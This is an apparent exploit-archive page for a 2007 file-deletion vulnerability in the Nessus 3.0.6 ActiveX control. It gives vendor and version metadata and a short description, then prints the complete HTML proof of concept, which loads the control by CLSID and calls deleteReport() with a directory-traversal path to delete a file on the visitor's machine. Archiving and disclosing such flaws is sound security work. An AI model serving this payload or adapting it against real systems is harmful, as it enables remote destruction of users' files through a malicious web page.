header-logo
Suggest Exploit
vendor:
Nessus Vulnerability Scanner
by:
Krystian Kloskowski (h07)
7.5
CVSS
HIGH
ActiveX Remote Delete File Exploit
20
CWE
Product Name: Nessus Vulnerability Scanner
Affected Version From: Nessus 3.0.6
Affected Version To: Nessus 3.0.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Internet Explorer 6 on Windows XP SP2 (Polish)
2007

Nessus Vulnerability Scanner 3.0.6 ActiveX deleteReport() 0day Remote Delete File Exploit

This exploit targets the deleteReport() function in the Nessus Vulnerability Scanner 3.0.6 ActiveX control. By passing a relative path to the deleteReport() function, an attacker can delete arbitrary files on the system. The exploit was discovered by Krystian Kloskowski (h07) and has been tested on Nessus 3.0.6 running on Internet Explorer 6 on Windows XP SP2 (Polish). This exploit is provided for demonstration purposes only.

Mitigation:

The vendor should release a patch to fix this vulnerability.
Source

Exploit-DB raw data:

<HTML>
<!--
Nessus Vulnerability Scanner 3.0.6 ActiveX deleteReport() 0day Remote Delete File Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->

<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt
alert("done");
</script>
</HTML>

# milw0rm.com [2007-07-26]